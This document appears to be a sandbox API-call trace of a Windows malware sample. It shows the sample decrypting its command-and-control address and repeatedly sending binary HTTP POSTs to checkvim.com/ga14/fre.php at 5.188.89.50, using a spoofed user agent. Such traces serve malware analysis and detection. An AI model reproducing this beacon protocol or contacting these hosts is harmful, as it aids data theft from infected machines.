[0282.740] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0282.740] GetProcessHeap () returned 0x840000 [0282.740] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0282.740] send (s=0x454, buf=0x873a58*, len=237, flags=0) returned 237 [0282.740] send (s=0x454, buf=0x87eb58*, len=159, flags=0) returned 159 [0282.740] GetProcessHeap () returned 0x840000 [0282.741] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0282.741] recv (in: s=0x454, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0283.079] GetProcessHeap () returned 0x840000 [0283.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0283.079] GetProcessHeap () returned 0x840000 [0283.079] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0283.079] GetProcessHeap () returned 0x840000 [0283.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0283.080] GetProcessHeap () returned 0x840000 [0283.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0283.080] closesocket (s=0x454) returned 0 [0283.080] GetProcessHeap () returned 0x840000 [0283.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0283.080] GetProcessHeap () returned 0x840000 [0283.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0283.080] GetProcessHeap () returned 0x840000 [0283.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0283.080] GetProcessHeap () returned 0x840000 [0283.080] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0283.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x848) returned 0x454 [0283.082] Sleep (dwMilliseconds=0xea60) [0283.084] GetProcessHeap () returned 0x840000 [0283.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0283.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.085] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0283.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.090] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0283.107] GetProcessHeap () returned 0x840000 [0283.107] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0283.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.108] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0283.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.109] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0283.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.111] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.111] GetProcessHeap () returned 0x840000 [0283.111] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0283.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.112] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0283.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.113] CryptDestroyKey (hKey=0x87e330) returned 1 [0283.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.115] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0283.115] GetProcessHeap () returned 0x840000 [0283.115] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0283.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.116] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.117] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.118] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.119] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.119] GetProcessHeap () returned 0x840000 [0283.119] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0283.119] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0283.119] GetProcessHeap () returned 0x840000 [0283.119] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0283.119] GetProcessHeap () returned 0x840000 [0283.119] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0283.119] GetProcessHeap () returned 0x840000 [0283.119] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0283.119] GetProcessHeap () returned 0x840000 [0283.119] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0283.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.120] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0283.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.128] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0283.137] GetProcessHeap () returned 0x840000 [0283.137] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0283.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.138] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0283.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.139] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0283.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.140] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.140] GetProcessHeap () returned 0x840000 [0283.140] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0283.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.141] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0283.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.142] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0283.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.143] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0283.143] GetProcessHeap () returned 0x840000 [0283.143] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0283.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.144] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0283.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.145] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0283.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.147] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0283.147] GetProcessHeap () returned 0x840000 [0283.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0283.147] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0283.148] GetProcessHeap () returned 0x840000 [0283.148] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0283.148] socket (af=2, type=1, protocol=6) returned 0x458 [0283.148] connect (s=0x458, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0283.215] FreeAddrInfoW (pAddrInfo=0x871510*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0283.215] GetProcessHeap () returned 0x840000 [0283.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0283.215] GetProcessHeap () returned 0x840000 [0283.215] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0283.215] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0283.216] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0283.216] GetProcessHeap () returned 0x840000 [0283.216] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0283.216] GetProcessHeap () returned 0x840000 [0283.216] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0283.217] GetProcessHeap () returned 0x840000 [0283.217] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f7a0 [0283.217] GetProcessHeap () returned 0x840000 [0283.217] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0283.217] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0283.218] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0283.218] GetProcessHeap () returned 0x840000 [0283.218] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0283.218] GetProcessHeap () returned 0x840000 [0283.218] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0283.218] send (s=0x458, buf=0x873a58*, len=237, flags=0) returned 237 [0283.219] send (s=0x458, buf=0x87eb58*, len=159, flags=0) returned 159 [0283.219] GetProcessHeap () returned 0x840000 [0283.219] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0283.219] recv (in: s=0x458, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0283.592] GetProcessHeap () returned 0x840000 [0283.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0283.592] GetProcessHeap () returned 0x840000 [0283.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0283.592] GetProcessHeap () returned 0x840000 [0283.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0283.592] GetProcessHeap () returned 0x840000 [0283.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0283.593] closesocket (s=0x458) returned 0 [0283.593] GetProcessHeap () returned 0x840000 [0283.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0283.593] GetProcessHeap () returned 0x840000 [0283.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0283.593] GetProcessHeap () returned 0x840000 [0283.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0283.593] GetProcessHeap () returned 0x840000 [0283.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0283.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x154) returned 0x458 [0283.595] Sleep (dwMilliseconds=0xea60) [0283.596] GetProcessHeap () returned 0x840000 [0283.596] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0283.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.598] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0283.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.604] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0283.612] GetProcessHeap () returned 0x840000 [0283.612] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0283.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.613] CryptImportKey (in: hProv=0x86fa40, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0283.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.615] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0283.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.620] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.620] GetProcessHeap () returned 0x840000 [0283.620] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0283.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.621] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0283.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.622] CryptDestroyKey (hKey=0x87e370) returned 1 [0283.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.623] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0283.623] GetProcessHeap () returned 0x840000 [0283.623] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0283.624] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.624] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.625] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.627] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.628] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.628] GetProcessHeap () returned 0x840000 [0283.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0283.628] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0283.628] GetProcessHeap () returned 0x840000 [0283.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0283.628] GetProcessHeap () returned 0x840000 [0283.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0283.628] GetProcessHeap () returned 0x840000 [0283.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0283.628] GetProcessHeap () returned 0x840000 [0283.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0283.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.630] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0283.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.636] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0283.644] GetProcessHeap () returned 0x840000 [0283.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0283.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.645] CryptImportKey (in: hProv=0x86fce8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4b0) returned 1 [0283.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.647] CryptSetKeyParam (hKey=0x87e4b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0283.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.647] CryptSetKeyParam (hKey=0x87e4b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.647] GetProcessHeap () returned 0x840000 [0283.647] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0283.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.649] CryptDecrypt (in: hKey=0x87e4b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0283.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.650] CryptDestroyKey (hKey=0x87e4b0) returned 1 [0283.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0283.651] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0283.651] GetProcessHeap () returned 0x840000 [0283.651] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0283.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.652] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0283.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.653] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0283.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0283.654] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0283.654] GetProcessHeap () returned 0x840000 [0283.654] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0283.654] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0283.656] GetProcessHeap () returned 0x840000 [0283.656] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bc8 [0283.656] socket (af=2, type=1, protocol=6) returned 0x45c [0283.656] connect (s=0x45c, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0283.728] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0283.732] GetProcessHeap () returned 0x840000 [0283.732] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0283.733] GetProcessHeap () returned 0x840000 [0283.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0283.733] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0283.735] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0283.735] GetProcessHeap () returned 0x840000 [0283.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0283.735] GetProcessHeap () returned 0x840000 [0283.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0283.735] GetProcessHeap () returned 0x840000 [0283.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0283.735] GetProcessHeap () returned 0x840000 [0283.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0283.736] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0283.737] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0283.737] GetProcessHeap () returned 0x840000 [0283.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0283.737] GetProcessHeap () returned 0x840000 [0283.737] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0283.737] send (s=0x45c, buf=0x873a58*, len=237, flags=0) returned 237 [0283.738] send (s=0x45c, buf=0x87eb58*, len=159, flags=0) returned 159 [0283.738] GetProcessHeap () returned 0x840000 [0283.739] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0283.740] recv (in: s=0x45c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0284.101] GetProcessHeap () returned 0x840000 [0284.101] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0284.101] GetProcessHeap () returned 0x840000 [0284.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0284.102] GetProcessHeap () returned 0x840000 [0284.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0284.102] GetProcessHeap () returned 0x840000 [0284.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0284.102] closesocket (s=0x45c) returned 0 [0284.102] GetProcessHeap () returned 0x840000 [0284.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bc8 | out: hHeap=0x840000) returned 1 [0284.102] GetProcessHeap () returned 0x840000 [0284.102] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0284.103] GetProcessHeap () returned 0x840000 [0284.103] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0284.103] GetProcessHeap () returned 0x840000 